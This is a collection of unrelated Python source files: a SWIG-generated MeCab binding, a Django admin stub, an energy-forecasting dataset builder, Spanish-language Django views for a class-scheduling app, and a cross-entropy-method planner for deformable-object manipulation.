__swig_getmethods__["prob"] = _MeCab.Path_prob_get
if _newclass:
prob = _swig_property(_MeCab.Path_prob_get, _MeCab.Path_prob_set)
Path_swigregister = _MeCab.Path_swigregister
Path_swigregister(Path)
class Node(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Node, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Node, name)
def __init__(self, *args, **kwargs):
raise AttributeError("No constructor defined")
__repr__ = _swig_repr
__swig_getmethods__["prev"] = _MeCab.Node_prev_get
if _newclass:
prev = _swig_property(_MeCab.Node_prev_get)
__swig_getmethods__["next"] = _MeCab.Node_next_get
if _newclass:
next = _swig_property(_MeCab.Node_next_get)
__swig_getmethods__["enext"] = _MeCab.Node_enext_get
if _newclass:
enext = _swig_property(_MeCab.Node_enext_get)
__swig_getmethods__["bnext"] = _MeCab.Node_bnext_get
if _newclass:
bnext = _swig_property(_MeCab.Node_bnext_get)
__swig_getmethods__["rpath"] = _MeCab.Node_rpath_get
if _newclass:
rpath = _swig_property(_MeCab.Node_rpath_get)
__swig_getmethods__["lpath"] = _MeCab.Node_lpath_get
if _newclass:
lpath = _swig_property(_MeCab.Node_lpath_get)
__swig_getmethods__["feature"] = _MeCab.Node_feature_get
if _newclass:
feature = _swig_property(_MeCab.Node_feature_get)
__swig_getmethods__["id"] = _MeCab.Node_id_get
if _newclass:
id = _swig_property(_MeCab.Node_id_get)
__swig_getmethods__["length"] = _MeCab.Node_length_get
if _newclass:
length = _swig_property(_MeCab.Node_length_get)
__swig_getmethods__["rlength"] = _MeCab.Node_rlength_get
if _newclass:
rlength = _swig_property(_MeCab.Node_rlength_get)
__swig_getmethods__["rcAttr"] = _MeCab.Node_rcAttr_get
if _newclass:
rcAttr = _swig_property(_MeCab.Node_rcAttr_get)
__swig_getmethods__["lcAttr"] = _MeCab.Node_lcAttr_get
if _newclass:
lcAttr = _swig_property(_MeCab.Node_lcAttr_get)
__swig_getmethods__["posid"] = _MeCab.Node_posid_get
if _newclass:
posid = _swig_property(_MeCab.Node_posid_get)
__swig_getmethods__["char_type"] = _MeCab.Node_char_type_get
if _newclass:
char_type = _swig_property(_MeCab.Node_char_type_get)
__swig_getmethods__["stat"] = _MeCab.Node_stat_get
if _newclass:
stat = _swig_property(_MeCab.Node_stat_get)
__swig_getmethods__["isbest"] = _MeCab.Node_isbest_get
if _newclass:
isbest = _swig_property(_MeCab.Node_isbest_get)
__swig_getmethods__["alpha"] = _MeCab.Node_alpha_get
if _newclass:
alpha = _swig_property(_MeCab.Node_alpha_get)
__swig_getmethods__["beta"] = _MeCab.Node_beta_get
if _newclass:
beta = _swig_property(_MeCab.Node_beta_get)
__swig_setmethods__["prob"] = _MeCab.Node_prob_set
__swig_getmethods__["prob"] = _MeCab.Node_prob_get
if _newclass:
prob = _swig_property(_MeCab.Node_prob_get, _MeCab.Node_prob_set)
__swig_getmethods__["wcost"] = _MeCab.Node_wcost_get
if _newclass:
wcost = _swig_property(_MeCab.Node_wcost_get)
__swig_getmethods__["cost"] = _MeCab.Node_cost_get
if _newclass:
cost = _swig_property(_MeCab.Node_cost_get)
__swig_getmethods__["surface"] = _MeCab.Node_surface_get
if _newclass:
surface = _swig_property(_MeCab.Node_surface_get)
Node_swigregister = _MeCab.Node_swigregister
Node_swigregister(Node)
MECAB_NOR_NODE = _MeCab.MECAB_NOR_NODE
MECAB_UNK_NODE = _MeCab.MECAB_UNK_NODE
MECAB_BOS_NODE = _MeCab.MECAB_BOS_NODE
MECAB_EOS_NODE = _MeCab.MECAB_EOS_NODE
MECAB_EON_NODE = _MeCab.MECAB_EON_NODE
MECAB_SYS_DIC = _MeCab.MECAB_SYS_DIC
MECAB_USR_DIC = _MeCab.MECAB_USR_DIC
MECAB_UNK_DIC = _MeCab.MECAB_UNK_DIC
MECAB_ONE_BEST = _MeCab.MECAB_ONE_BEST
MECAB_NBEST = _MeCab.MECAB_NBEST
MECAB_PARTIAL = _MeCab.MECAB_PARTIAL
MECAB_MARGINAL_PROB = _MeCab.MECAB_MARGINAL_PROB
MECAB_ALTERNATIVE = _MeCab.MECAB_ALTERNATIVE
MECAB_ALL_MORPHS = _MeCab.MECAB_ALL_MORPHS
MECAB_ALLOCATE_SENTENCE = _MeCab.MECAB_ALLOCATE_SENTENCE
MECAB_ANY_BOUNDARY = _MeCab.MECAB_ANY_BOUNDARY
MECAB_TOKEN_BOUNDARY = _MeCab.MECAB_TOKEN_BOUNDARY
MECAB_INSIDE_TOKEN = _MeCab.MECAB_INSIDE_TOKEN
class Lattice(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Lattice, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Lattice, name)
__repr__ = _swig_repr
def clear(self):
return _MeCab.Lattice_clear(self)
def is_available(self):
return _MeCab.Lattice_is_available(self)
def bos_node(self):
return _MeCab.Lattice_bos_node(self)
def eos_node(self):
return _MeCab.Lattice_eos_node(self)
def end_nodes(self, pos):
return _MeCab.Lattice_end_nodes(self, pos)
def begin_nodes(self, pos):
return _MeCab.Lattice_begin_nodes(self, pos)
def sentence(self):
return _MeCab.Lattice_sentence(self)
def size(self):
return _MeCab.Lattice_size(self)
def set_Z(self, Z):
return _MeCab.Lattice_set_Z(self, Z)
def Z(self):
return _MeCab.Lattice_Z(self)
def set_theta(self, theta):
return _MeCab.Lattice_set_theta(self, theta)
def theta(self):
return _MeCab.Lattice_theta(self)
def next(self):
return _MeCab.Lattice_next(self)
def request_type(self):
return _MeCab.Lattice_request_type(self)
def has_request_type(self, request_type):
return _MeCab.Lattice_has_request_type(self, request_type)
def set_request_type(self, request_type):
return _MeCab.Lattice_set_request_type(self, request_type)
def add_request_type(self, request_type):
return _MeCab.Lattice_add_request_type(self, request_type)
def remove_request_type(self, request_type):
return _MeCab.Lattice_remove_request_type(self, request_type)
def newNode(self):
return _MeCab.Lattice_newNode(self)
def toString(self, *args):
return _MeCab.Lattice_toString(self, *args)
def enumNBestAsString(self, N):
return _MeCab.Lattice_enumNBestAsString(self, N)
def has_constraint(self):
return _MeCab.Lattice_has_constraint(self)
def boundary_constraint(self, pos):
return _MeCab.Lattice_boundary_constraint(self, pos)
def feature_constraint(self, pos):
return _MeCab.Lattice_feature_constraint(self, pos)
def set_boundary_constraint(self, pos, boundary_constraint_type):
return _MeCab.Lattice_set_boundary_constraint(self, pos, boundary_constraint_type)
def set_feature_constraint(self, begin_pos, end_pos, feature):
return _MeCab.Lattice_set_feature_constraint(self, begin_pos, end_pos, feature)
def set_result(self, result):
return _MeCab.Lattice_set_result(self, result)
def what(self):
return _MeCab.Lattice_what(self)
def set_what(self, str):
return _MeCab.Lattice_set_what(self, str)
__swig_destroy__ = _MeCab.delete_Lattice
__del__ = lambda self: None
def __init__(self):
this = _MeCab.new_Lattice()
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def set_sentence(self, sentence):
return _MeCab.Lattice_set_sentence(self, sentence)
Lattice_swigregister = _MeCab.Lattice_swigregister
Lattice_swigregister(Lattice)
class Model(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Model, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Model, name)
__repr__ = _swig_repr
def dictionary_info(self):
return _MeCab.Model_dictionary_info(self)
def transition_cost(self, rcAttr, lcAttr):
return _MeCab.Model_transition_cost(self, rcAttr, lcAttr)
def lookup(self, begin, end, lattice):
return _MeCab.Model_lookup(self, begin, end, lattice)
def createTagger(self):
return _MeCab.Model_createTagger(self)
def createLattice(self):
return _MeCab.Model_createLattice(self)
def swap(self, model):
return _MeCab.Model_swap(self, model)
if _newclass:
version = staticmethod(_MeCab.Model_version)
else:
version = _MeCab.Model_version
__swig_destroy__ = _MeCab.delete_Model
__del__ = lambda self: None
def __init__(self, *args):
this = _MeCab.new_Model(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
Model_swigregister = _MeCab.Model_swigregister
Model_swigregister(Model)
def Model_version():
return _MeCab.Model_version()
Model_version = _MeCab.Model_version
class Tagger(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, Tagger, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, Tagger, name)
__repr__ = _swig_repr
def parse(self, *args):
return _MeCab.Tagger_parse(self, *args)
def parseToNode(self, str):
return _MeCab.Tagger_parseToNode(self, str)
def parseNBest(self, N, str):
return _MeCab.Tagger_parseNBest(self, N, str)
def parseNBestInit(self, str):
return _MeCab.Tagger_parseNBestInit(self, str)
def nextNode(self):
return _MeCab.Tagger_nextNode(self)
def next(self):
return _MeCab.Tagger_next(self)
def formatNode(self, node):
return _MeCab.Tagger_formatNode(self, node)
def set_request_type(self, request_type):
return _MeCab.Tagger_set_request_type(self, request_type)
def request_type(self):
return _MeCab.Tagger_request_type(self)
def partial(self):
return _MeCab.Tagger_partial(self)
def set_partial(self, partial):
return _MeCab.Tagger_set_partial(self, partial)
def lattice_level(self):
return _MeCab.Tagger_lattice_level(self)
def set_lattice_level(self, level):
return _MeCab.Tagger_set_lattice_level(self, level)
def all_morphs(self):
return _MeCab.Tagger_all_morphs(self)
def set_all_morphs(self, all_morphs):
return _MeCab.Tagger_set_all_morphs(self, all_morphs)
def set_theta(self, theta):
return _MeCab.Tagger_set_theta(self, theta)
def theta(self):
return _MeCab.Tagger_theta(self)
def dictionary_info(self):
return _MeCab.Tagger_dictionary_info(self)
def what(self):
return _MeCab.Tagger_what(self)
__swig_destroy__ = _MeCab.delete_Tagger
__del__ = lambda self: None
if _newclass:
version = staticmethod(_MeCab.Tagger_version)
else:
version = _MeCab.Tagger_version
def __init__(self, *args):
this = _MeCab.new_Tagger(*args)
try:
self.this.append(this)
except __builtin__.Exception:
self.this = this
def parseToString(self, str, length=0):
return _MeCab.Tagger_parseToString(self, str, length)
Tagger_swigregister = _MeCab.Tagger_swigregister
Tagger_swigregister(Tagger)
def Tagger_version():
return _MeCab.Tagger_version()
Tagger_version = _MeCab.Tagger_version
VERSION = _MeCab.VERSION
# This file is compatible with both classic and new-style classes.
|
from django.contrib import admin
from profile.models import UserProfile
admin.site.register(UserProfile) |
import os
from collections import defaultdict
from Fuzzy_clustering.version2.common_utils.logging import create_logger
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load_lv import dataset_creator_LV
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load import dataset_creator_load
from Fuzzy_clustering.version2.dataset_manager.create_dataset_for_load_scada import dataset_creator_scada
from Fuzzy_clustering.version2.dataset_manager.create_datasets_dense import DatasetCreatorDense
from Fuzzy_clustering.version2.dataset_manager.create_datasets_point import DatasetCreatorPoint
from Fuzzy_clustering.version2.dataset_manager.create_datasets_for_fa import dataset_creator_ecmwf
from Fuzzy_clustering.version2.dataset_manager.create_datasets_for_fa import dataset_creator_xmachina
from Fuzzy_clustering.version2.dataset_manager.create_datasets_pca import DatasetCreatorPCA
class DatasetCreator:
def __init__(self, static_data, group_static_data, test):
self.test = test
self.group_static_data = group_static_data
self.static_data = static_data
self.file_data = static_data['data_file_name']
self.project_owner = static_data['project_owner']
self.projects_group = static_data['projects_group']
self.area_group = static_data['area_group']
self.version_group = static_data['version_group']
self.version_model = static_data['version_model']
self.weather_in_data = static_data['weather_in_data']
self.nwp_model = static_data['NWP_model']
self.nwp_resolution = static_data['NWP_resolution']
self.data_variables = static_data['data_variables']
self.model_type = static_data['type']
self.sys_folder = self.static_data['sys_folder']
self.path_nwp = self.static_data['path_nwp']
self.path_group = self.static_data['path_group']
self.path_nwp_group = self.static_data['path_nwp_group']
self.logger = create_logger(logger_name=f'DataManager_{self.model_type}', abs_path=self.path_group,
logger_path='log_data_manager.log')
# if self.test is True creates the files with suffix _test that are used in evaluation procedure
# else if self.test is False creates the files that are used in training procedure
if self.test is not None:
self.dataset_x = 'dataset_X_test.csv' if self.test else 'dataset_X.csv'
self.dataset_y = 'dataset_y_test.csv' if self.test else 'dataset_y.csv'
self.dataset_lstm = 'dataset_lstm_test.pickle' if self.test else 'dataset_lstm.pickle'
self.dataset_cnn = 'dataset_cnn_test.pickle' if self.test else 'dataset_cnn.pickle'
else:
self.dataset_x = 'dataset_X_test.csv'
self.dataset_y = 'dataset_y_test.csv'
self.dataset_lstm = 'dataset_lstm_test.pickle'
self.dataset_cnn = 'dataset_cnn_test.pickle'
def create_datasets(self, data):
"""
This function calls the data creators (PCA or dense) of every problem (wind, pv, load etc). Removes old files if
'recreate_datasets' parameter in static_data is True in order to create new files
:param data:
pandas dataframe each column might be a different project for the cases wind and pv or for the cases of
load and Gas the first column is the project and the following columns are explanatory variables
:return:
'Done' if the files are created successfully
"""
if (self.static_data['recreate_datasets']) or (self.test is None):
for project in self.group_static_data:
path_prefix = project['static_data']['path_data']
dataset_x_path = os.path.join(path_prefix, self.dataset_x)
if os.path.exists(dataset_x_path):
os.remove(dataset_x_path)
dataset_y_path = os.path.join(path_prefix, self.dataset_y)
if os.path.exists(dataset_y_path):
os.remove(dataset_y_path)
dataset_cnn_path = os.path.join(path_prefix, self.dataset_cnn)
if os.path.exists(dataset_cnn_path):
os.remove(dataset_cnn_path)
dataset_lstm_path = os.path.join(path_prefix, self.dataset_lstm)
if os.path.exists(dataset_lstm_path):
os.remove(dataset_lstm_path)
project_info = defaultdict(list)
for project in self.group_static_data:
path_prefix = project['static_data']['path_data']
# FIXME: With that implementation you can't have a dataset with PCA and Dense at the same time.
if not (os.path.exists(os.path.join(path_prefix, self.dataset_x)) or
os.path.exists(os.path.join(path_prefix, self.dataset_y))):
# TODO: Cleanse or filter wrong/missing values
project_info['projects'].append(project)
project_info['path_prefixes'].append(path_prefix)
project_info['project_cols'].append(project['_id'])
print(project_info)
if len(project_info['projects']) > 0:
if self.model_type in {'pv', 'wind'}:
self.load_pv_wind(data, project_info)
elif self.model_type == 'load':
self.load_energy(data, project_info)
elif self.model_type == 'fa':
self.load_gas(data, project_info)
else:
raise ValueError(f"Cannot recognize model type {self.model_type}")
return 'Done'
def load_pv_wind(self, data, project_info):
if self.static_data['compress_data'] == 'PCA':
print()
for project, path_prefix in zip(project_info['projects'], project_info['path_prefixes']):
if self.static_data['recreate_datasets']: # FIXME: Why do we delete it only under PCA?
os.remove(os.path.join(path_prefix, 'nwps_3d.pickle'))
if project['_id'] != self.projects_group + '_' + self.model_type:
# Datasets are processed and created within the functions
dataset = DatasetCreatorPCA(project,
data=data[project['_id']].dropna(),
n_jobs=self.static_data['njobs'],
test=self.test)
dataset.make_dataset_res()
self.logger.info('Dataset using PCA for testing constructed for %s', project['_id'])
else: # All projects under a country are executed, PCA can't process that kind of data.
dataset = DatasetCreatorDense(self.projects_group,
project,
data[project['_id']].dropna(),
self.path_nwp_group,
self.nwp_model,
self.nwp_resolution,
self.data_variables,
njobs=self.static_data['njobs'],
test=self.test)
if self.test is not None:
dataset.make_dataset_res()
else:
dataset.make_dataset_res_short_term()
elif self.static_data['compress_data'] == 'dense':
self.logger.info(f'Start creating dataset using dense compression for country {self.projects_group}')
for project in project_info['projects']:
self.logger.info(f"Start creating dataset using dense compression for projects {project['_id']}")
if len(project_info['project_cols']) > 0:
dataset = DatasetCreatorDense(self.projects_group,
project_info['projects'],
data[project_info['project_cols']].dropna(axis=1),
self.path_nwp_group,
self.nwp_model,
self.nwp_resolution,
self.data_variables,
njobs=self.static_data['njobs'],
test=self.test)
if self.test is not None:
dataset.make_dataset_res()
else:
dataset.make_dataset_res_short_term()
self.logger.info(f'Dataset using dense compression for country {self.projects_group} created')
elif self.static_data['compress_data'] == 'point':
self.logger.info(f'Start creating dataset using dense compression for country {self.projects_group}')
for project in project_info['projects']:
self.logger.info(f"Start creating dataset using dense compression for projects {project['_id']}")
if len(project_info['project_cols']) > 0:
dataset = DatasetCreatorPoint(self.projects_group,
project_info['projects'],
data[project_info['project_cols']].dropna(),
self.path_nwp_group,
self.nwp_model,
self.nwp_resolution,
self.data_variables,
njobs=self.static_data['njobs'],
test=self.test)
if self.test is not None:
dataset.make_dataset_res()
else:
dataset.make_dataset_res_short_term()
self.logger.info(f'Dataset using dense compression for country {self.projects_group} created')
else:
raise ValueError(
f"Cannot recognize dimensionality reduction method {self.static_data['compress_data']}")
def load_energy(self, data, project_info):
if len(project_info['project_cols']) > 0:
self.logger.info('Start creating dataset for load')
if self.nwp_model == 'ecmwf':
if project_info['project_cols'][0] == 'SCADA':
dataset = dataset_creator_scada(self.projects_group, project_info['projects'], data,
self.path_nwp_group,
self.nwp_model, self.nwp_resolution, self.data_variables,
njobs=self.static_data['njobs'], test=self.test)
dataset.make_dataset_scada()
elif project_info['project_cols'][0] == 'lv_load':
dataset = dataset_creator_LV(self.projects_group, project_info['projects'], data, self.path_nwp_group,
self.nwp_model, self.nwp_resolution, self.data_variables,
njobs=self.static_data['njobs'], test=self.test)
dataset.make_dataset_lv()
elif self.nwp_model in {'gfs', 'skiron'}:
dataset = dataset_creator_load(self.projects_group, project_info['projects'], data,
self.path_nwp_group,
self.nwp_model, self.nwp_resolution, self.data_variables,
njobs=self.static_data['njobs'], test=self.test)
if self.test is not None:
dataset.make_dataset_load()
else:
dataset.make_dataset_load_short_term()
def load_gas(self, data, project_info):
if len(project_info['project_cols']) > 0:
self.logger.info('Start creating dataset for fa')
if self.nwp_model == 'ecmwf':
dataset = dataset_creator_ecmwf(self.projects_group, project_info['projects'], data,
self.path_nwp_group,
self.nwp_model, self.nwp_resolution,
self.data_variables,
njobs=self.static_data['njobs'], test=self.test)
dataset.make_dataset_ecmwf()
elif self.nwp_model == 'xmachina':
dataset = dataset_creator_xmachina(self.projects_group, project_info['projects'], data,
self.path_nwp_group,
self.nwp_model, self.nwp_resolution,
self.data_variables,
njobs=self.static_data['njobs'], test=self.test)
if self.version_model == 0:
dataset.make_dataset_xmachina_curr()
else:
dataset.make_dataset_xmachina_dayahead()
|
from django.shortcuts import render, redirect, get_object_or_404, get_list_or_404
from django.views import generic
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from .models import Materias, PNF, Profesores, Secciones, Trimestre, Horarios, Salones
from .form import MateriaForm, HorarioForm
import json
def index(request):
if request.user.is_authenticated:
return render(request, 'calendario.html', {})
else:
if request.method == 'POST':
username = request.POST.get('username', None)
password = request.POST.get('password', None)
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('home')
else:
return render(request, 'login.html', {'user': username})
return render(request, 'login.html', {})
def redireccion(request):
if request.method == "POST":
return redirect('home')
def logout_view(request):
logout(request)
return redirect('home')
def confirmado(request):
return render(request, 'confirmado.html')
# ################# Horarios ##################
def HorarioDetail(request, id):
horario = get_object_or_404(Horarios, id=id)
try:
posicion = json.loads(horario.posicion)
return (
render(request, "horario/horarios_detail.html",
context={'horarios': horario, 'posicion': posicion},
)
)
except (KeyError, Horarios.DoesNotExist):
return render(request, 'listasHorarios/secciones_h.html', {
'question': horario,
'error_message': "Ese Horario no existe, por favor escoja otro.",
})
@login_required
def CrearHorario(request, id):
trimestre = Trimestre.objects.filter(id=id)
if request.method == "POST":
form = HorarioForm(request.POST)
if form.is_valid():
form.save()
else:
form = HorarioForm()
return render(request, 'horario/horarios_form.html', context={'form': form, 'trimestre': trimestre})
@login_required
def HorarioUpdate(request, id):
horario = get_object_or_404(Horarios, id=id)
trimestre = Trimestre.objects.filter(codigo__icontains=horario.seccion.trimestre)
if request.method == "POST":
form = HorarioForm(request.POST, instance=horario)
if form.is_valid():
form.save()
redirect("horario/secciones")
else:
form = HorarioForm()
try:
posicion = json.loads(horario.posicion)
return (
render(request, "horario/horario_update.html",
context={'horarios': horario, 'posicion': posicion, 'form': form, 'trimestre': trimestre},
)
)
except (KeyError, Horarios.DoesNotExist):
return render(request, 'listasHorarios/secciones_h.html', {
'question': horario,
'error_message': "Ese Horario no existe, por favor escoja otro.",
})
class DeleteHorario(LoginRequiredMixin, generic.DeleteView):
model = Horarios
success_url = "horario/secciones"
@login_required
def Horario_profesor(request, id_profesor):
profesor = get_object_or_404(Profesores, id=id_profesor)
horario = Horarios.objects.filter(seccion__profesores=profesor)
posicion = []
try:
for h in horario:
posiciones = json.loads(h.posicion)
for i in posiciones:
for m in profesor.materias.all():
if m.nombre in str(i):
posicion.append(i)
return (
render(request, "listasHorarios/horario_profesor.html",
context={'horarios': horario, 'posicion': posicion, 'profesor': profesor},
)
)
except (KeyError, Horarios.DoesNotExist):
return render(request, 'listasHorarios/secciones_h.html', {
'question': horario,
'error_message': "Ese Horario no existe, por favor escoja otro.",
})
@login_required
def Horario_salon(request, salon_id):
salon = get_object_or_404(PNF, id=salon_id)
try:
profesor = Profesores.objects.filter(pnf__nombre=salon)
return (
render(request, "listasHorarios/salon_h.html",
context={'profesor': profesor, 'salon': salon},
)
)
except (KeyError, Profesores.DoesNotExist):
return render(request, 'horario/lista.html', {
'question': salon,
'error_message': "Ese PNF no existe, por favor escoja otro.",
})
def listaSeccionHorario(request):
secciones = Secciones.objects.all()
horarios = Horarios.objects.all()
seccio = []
for i in horarios:
seccio.append(i.seccion)
return (
render(request, "listasHorarios/secciones_h.html",
context={'secciones': secciones, 'conHorario': seccio, 'horarios': horarios},
)
)
def listaProfesorHorario(request):
profesores = Profesores.objects.all()
horarios = Horarios.objects.all()
profe = []
for i in horarios:
for p in i.seccion.profesores.all():
if p not in profe:
profe.append(p)
return (
render(request, "listasHorarios/profesores_h.html",
context={'secciones': profesores, 'conHorario': profe, 'horarios': horarios},
)
)
# ################# Materias ##################
@login_required
def crearMateria(request):
if request.method == "POST":
form = MateriaForm(request.POST)
if form.is_valid():
form.save()
else:
form = MateriaForm()
return render(request, 'horario/generic_form.html', {'form': form})
class ListMaterias(generic.ListView):
model = Materias
class UpdateMaterias(LoginRequiredMixin, generic.UpdateView):
model = Materias
fields = ['nombre', 'codigo', 'unidadesC']
template_name = 'horario/generic_form.html'
success_url = '/confirmado'
class DeleteMaterias(generic.DeleteView):
model = Materias
fields = ['nombre', 'codigo', 'unidadesC']
template_name = 'horario/delete_form.html'
success_url = '/confirmado'
# ################# PNF ##################
class ListPNF(generic.ListView):
model = PNF
class CrearPNF(generic.CreateView):
model = PNF
fields = ['nombre', 'trimetres']
template_name = 'horario/generic_form.html'
class UpdatePNF(generic.UpdateView):
model = PNF
fields = ['nombre', 'trimetres']
template_name = 'horario/generic_form.html'
success_url = '/confirmado'
class DeletePNF(generic.DeleteView):
model = PNF
fields = ['nombre', 'trimetres']
template_name = 'horario/delete_form.html'
success_url = '/confirmado'
# ################# Profesores ##################
class CrearProfesor(generic.CreateView):
model = Profesores
fields = ['nombre', 'pnf']
template_name = 'horario/generic_form.html'
class UpdateProfesor(generic.UpdateView):
model = Profesores
fields = ['nombre', 'pnf']
template_name = 'horario/generic_form.html'
success_url = '/confirmado'
class DeleteProfesor(generic.DeleteView):
model = Profesores
fields = ['nombre', 'pnf']
template_name = 'horario/delete_form.html'
success_url = '/confirmado'
class ListProfesor(generic.ListView):
model = Profesores
template_name = 'horario/lista.html'
def Profesor_Pnf(request, pnf_nombre):
pnf = get_object_or_404(PNF, nombre=pnf_nombre)
try:
profesor = Profesores.objects.filter(pnf__nombre=pnf)
return (
render(request, "profe-pnf.html",
context={'profesor': profesor, 'pnf': pnf},
)
)
except (KeyError, Profesores.DoesNotExist):
return render(request, 'horario/lista.html', {
'question': pnf,
'error_message': "Ese PNF no existe, por favor escoja otro.",
})
# ################# Trimestres ##################
class ListTrimestre(generic.ListView):
model = Trimestre
template_name = 'horario/listaTrimestre.html'
class CrearTrimestre(generic.CreateView):
model = Trimestre
fields = '__all__'
template_name = 'horario/generic_form.html'
class TrimestreDetail(generic.DetailView):
model = Trimestre
class TrimestreUpdate(generic.UpdateView):
model = Trimestre
fields = '__all__'
template_name = 'horario/generic_form.html'
success_url = '/confirmado'
class TrimestreDelete(generic.DeleteView):
model = Trimestre
template_name = 'horario/delete_form.html'
success_url = '/confirmado'
# ################# Secciones ##################
class SeccionDetail(generic.DetailView):
model = Secciones
class ListaSecciones(generic.ListView):
model = Secciones
class CrearSecciones(generic.CreateView):
model = Secciones
fields = ['codigo', 'pnf', 'trimestre', 'modalidad', 'profesores']
template_name = 'horario/generic_form.html'
success_url = 'secciones'
class UpdateSecciones(generic.UpdateView):
model = Secciones
fields = ['codigo', 'pnf', 'trimestre', 'modalidad', 'profesores']
template_name = 'horario/generic_form.html'
success_url = '/confirmado'
class DeleteSecciones(generic.DeleteView):
model = Secciones
template_name = 'horario/delete_form.html'
success_url = '/confirmado'
|
import numpy as np
from numpy.linalg import det
from numpy import sqrt
from deform.model.dl_model import *
from deform.model.create_dataset import *
from deform.model.hidden_dynamics import get_next_state_linear
import math
import torch
from torch.utils.data import Dataset, DataLoader
from torchvision.utils import save_image
from torch.distributions import Uniform
from torch.distributions.multivariate_normal import MultivariateNormal
from torch.distributions.kl import kl_divergence
import torchvision.transforms.functional as TF
from PIL import Image
from deform.utils.utils import plot_cem_sample
import os
def sample_action(I, mean=None, cov=None):
'''TODO: unit test
each action sequence length: H
number of action sequences: N
'''
action = torch.tensor([0]*4, dtype=torch.float)
multiplier = torch.tensor([50, 50, 2*math.pi, 0.14])
addition = torch.tensor([0, 0, 0, 0.01])
thres = 0.9
if I[0][0][0][0] == 1.:
if ((mean is None) and (cov is None)):
action_base = Uniform(low=0.0, high=1.0).sample((4,))
action = torch.mul(action_base, multiplier) + addition
else:
cov = add_eye(cov)
action = MultivariateNormal(mean, cov).sample()
action[0], action[1] = 0, 0
return action
while I[0][0][torch.floor(action[0]).type(torch.LongTensor)][torch.floor(action[1]).type(torch.LongTensor)] != 1.:
if ((mean is None) and (cov is None)):
action_base = Uniform(low=0.0, high=1.0).sample((4,))
action = torch.mul(action_base, multiplier) + addition
else:
cov = add_eye(cov)
action = MultivariateNormal(mean, cov).sample()
while torch.floor(action[0]).type(torch.LongTensor) >= 50 or torch.floor(action[1]).type(torch.LongTensor) >= 50:
cov = add_eye(cov)
action = MultivariateNormal(mean, cov).sample()
return action
def generate_next_pred_state(recon_model, dyn_model, img_pre, act_pre):
'''generate next predicted state
reconstruction model: recon_model
dynamics model: dyn_model
initial image: img_pre
each action sequence length: H
number of action sequences: N
'''
latent_img_pre, latent_act_pre, _, _, _ = recon_model(img_pre.reshape((-1, 1, 50, 50)), act_pre.reshape((-1, 4)).type(torch.float), None)
K_T_pre, L_T_pre = dyn_model(img_pre.reshape((-1, 1, 50, 50)), act_pre.reshape((-1, 4)).type(torch.float))
recon_latent_img_cur = get_next_state_linear(latent_img_pre, latent_act_pre, K_T_pre, L_T_pre)
return recon_model.decoder(recon_latent_img_cur)
def generate_next_pred_state_in_n_step(recon_model, dyn_model, img_initial, N, H, mean=None, cov=None):
imgs = [None]*N
actions = torch.tensor([[0.]*4]*N)
for n in range(N):
img_tmp = img_initial
for h in range(H):
action = sample_action(img_tmp, mean, cov)
if h==0:
actions[n] = action
img_tmp = generate_next_pred_state(recon_model, dyn_model, img_tmp, action)
imgs[n] = img_tmp
return imgs, actions
def loss_function_img(img_recon, img_goal, N):
loss = torch.as_tensor([0.]*N)
for n in range(N):
loss[n] = F.binary_cross_entropy(img_recon[n].view(-1, 2500), img_goal.view(-1, 2500), reduction='sum')
return loss
def add_eye(cov):
if det(cov)==0:
return cov + torch.eye(4) * 0.000001
else:
return cov
def mahalanobis(dist, cov):
'''dist = mu1 - mu2, mu1 & mu2 are means of two multivariate gaussian distribution
matrix multiplication: dist^T * cov^(-1) * dist
'''
return (dist.transpose(0,1).mm(cov.inverse())).mm(dist)
def bhattacharyya(dist, cov1, cov2):
'''source: https://en.wikipedia.org/wiki/Bhattacharyya_distance
'''
cov = (cov1 + cov2) / 2
d1 = mahalanobis(dist.reshape((4,-1)), cov) / 8
if det(cov)==0 or det(cov1)==0 or det(cov2)==0:
return inf
d2 = np.log(det(cov) / sqrt(det(cov1) * det(cov2))) / 2
return d1 + d2
def main(recon_model, dyn_model, T, K, N, H, img_initial, img_goal, resz_act, step_i, KL):
for t in range(T):
print("***** Start Step {}".format(t))
if t==0:
img_cur = img_initial
#Initialize Q with uniform distribution
mean = None
cov = None
mean_tmp = None
cov_tmp = None
converge = False
iter_count = 0
while not converge:
imgs_recon, sample_actions = generate_next_pred_state_in_n_step(recon_model, dyn_model, img_cur, N, H, mean, cov)
#Calculate binary cross entropy loss for predicted image and goal image
loss = loss_function_img(imgs_recon, img_goal, N)
#Select K action sequences with lowest loss
loss_index = torch.argsort(loss)
sorted_sample_actions = sample_actions[loss_index]
#Fit multivariate gaussian distribution to K samples
#(see how to fit algorithm:
#https://stackoverflow.com/questions/27230824/fit-multivariate-gaussian-distribution-to-a-given-dataset)
mean = torch.mean(sorted_sample_actions[:K], dim=0).type(torch.DoubleTensor)
cov = torch.from_numpy(np.cov(sorted_sample_actions[:K], rowvar=0)).type(torch.DoubleTensor)
# iteration is based on convergence of Q
if det(cov) == 0 or cov_tmp == None:
mean_tmp = mean
cov_tmp = cov
continue
else:
if det(cov_tmp)==0:
mean_tmp = mean
cov_tmp = cov
continue
else:
p = MultivariateNormal(mean, cov)
q = MultivariateNormal(mean_tmp, cov_tmp)
if kl_divergence(p, q) < KL:
converge = True
mean_tmp = mean
cov_tmp = cov
print("***** At action time step {}, iteration {} *****".format(t, iter_count))
iter_count += 1
#Execute action a{t}* with lowest loss
action_best = sorted_sample_actions[0]
action_loss = ((action_best.detach().cpu().numpy()-resz_act[:4])**2).mean(axis=None)
#Observe new image I{t+1}
img_cur = generate_next_pred_state(recon_model, dyn_model, img_cur, action_best)
